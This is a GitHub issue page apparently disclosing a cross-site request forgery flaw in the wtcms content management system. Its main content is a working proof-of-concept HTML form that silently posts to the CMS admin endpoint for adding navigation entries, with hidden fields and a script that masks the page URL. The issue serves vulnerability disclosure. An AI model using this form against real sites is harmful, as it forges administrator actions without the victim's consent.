Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
You can add articles in admin background, but there is a CSRF vulnerability.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/cms/wtcms-master/index.php?g=admin&m=nav&a=add_post" method="POST"> <input type="hidden" name="cid" value="3" /> <input type="hidden" name="parentid" value="72" /> <input type="hidden" name="label" value="CSRF Test" /> <input type="hidden" name="nav" value="on" /> <input type="hidden" name="external_href" value="http://" /> <input type="hidden" name="target" value="" /> <input type="hidden" name="icon" value="" /> <input type="hidden" name="status" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
You can add articles in admin background, but there is a CSRF vulnerability.




POC
The text was updated successfully, but these errors were encountered: